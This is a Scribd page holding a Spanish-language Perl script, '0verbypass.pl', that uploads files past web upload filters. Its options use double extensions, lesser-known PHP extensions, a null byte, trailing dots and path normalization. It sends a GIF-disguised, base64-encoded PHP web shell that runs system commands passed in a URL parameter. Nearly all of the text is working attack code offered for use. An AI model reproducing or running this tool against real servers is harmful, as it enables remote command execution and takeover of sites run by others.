Scribd Logo
Cargar

¡Te damos la bienvenida a Scribd!

  • Untitled

    Cargado por

    rarara7094
    447 vistas2 páginas

    Derechos de autor

    © Attribution Non-Commercial (BY-NC)

    Formatos disponibles

    TXT, PDF, TXT o lea en línea desde Scribd

    ¿Le pareció útil este documento?

    ¿Este contenido es inapropiado?

    Denunciar este documento

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Descargue como TXT, PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    447 vistas2 páginas

    Untitled

    Cargado por

    rarara7094

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Descargue como TXT, PDF, TXT o lea en línea desde Scribd
    Marcar por contenido inapropiado
    de 2

    ###################0verbypass.pl v0.

    1###################
    # Esta herramienta est diseada para bypassear los #
    # uploaders utilizando los mtodos ms comunes que #
    # se suelen usar. Para cada uploader hay que cambiar #
    # name=\"archivo\"; en la lnea 52
    #
    ########################################################
    # Autor: The X-C3LL (overloadblog at hotmail dot com) #
    # Blog: 0verl0ad.blogspot.com
    #
    ########################################################
    # Uso: perl 0verbypass.pl [HOST] [FILE] [OPTION]
    #
    #
    #
    # -[Opciones]#
    # -d Doble extension
    #
    # -x Extensiones menos conocidas
    #
    # -n Null byte
    #
    # -l Puntos al final
    #
    # -p Normalizacion de rutas
    #
    ########################################################
    #
    Agradecimientos a Seth
    #
    ########################################################
    use IO::Socket;
    use MIME::Base64;
    $host = $ARGV[0];
    $php = $ARGV[1];
    $opt = $ARGV[2];
    if ($opt eq "-d"){ &cabecera($host,$php,"0verl0ad.gIf.PhP","228"); } elsif (
    $opt eq "-x") { &cabecera($host,$php,"0verl0ad.PhP5","226"); }
    elsif ($opt eq "-n") { &cabecera($host,$php,'0verl0ad.pHP\0.gif',"227"); } e
    lsif ($opt eq "-l"){ &cabecera($host,$php,"0verl0ad.PhP. ..","229"); }
    elsif ($opt eq "-p") { &cabecera($host,$php,"0verl0ad.pHp/./././././././././
    ./","246");}
    else { &help; }

    sub cabecera{
    print q (
    -=======[0verbypass.pl v0.1]=======[+] Conectando con el host...
    );
    $peticion = "POST $_[1] HTTP/1.1\n";
    $peticion .= "Host: $_[0]";
    $peticion .= "\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/form
    -data; boundary=---------------------------14171267928964\nContent-Length: $_[3]
    \n\n";
    $peticion .= "-----------------------------14171267928964\nContent-Dispositi
    on: form-data; name=\"archivo\"; filename=\"$_[2]\"";
    $peticion .= "\nContent-Type: image/gif\n\n";

    $peticion
    $peticion
    $peticion
    $socket =

    .= "GIF89a";
    .= decode_base64("PD9waHAgc3lzdGVtKCRfR0VUWydmdWNrJ10pOyA/Pg==");
    .= "\n-----------------------------14171267928964--\n\n";
    IO::Socket::INET->new(
    Proto => "tcp",
    PeerAddr => $_[0],
    PeerPort => "80",
    ) || die "[-] Error: no se pudo conectar con

    el host";
    print "[+] Enviando peticion...\n\n";
    print $socket $peticion;
    print $peticion;
    print "[+] Peticion enviada\n";
    @server = <$socket>;
    if ($server[0] =~ /200/ ) {
    print "[+] Archivo subido correctamente\n";
    } else { print "[-] Error: el archivo no pudo subirse";
    }
    close($socket);
    }
    sub help {
    print q(
    -=======[0verbypass.pl v0.1]=======Usage: perl 0verbypass.pl [HOST] [FILE] [OPTION]
    -=[OPTIONS]=-d Doble extension
    -x Extensiones menos conocidas
    -n Null byte
    -l Puntos al final
    -p Normalizacion de rutas
    );
    }

    También podría gustarte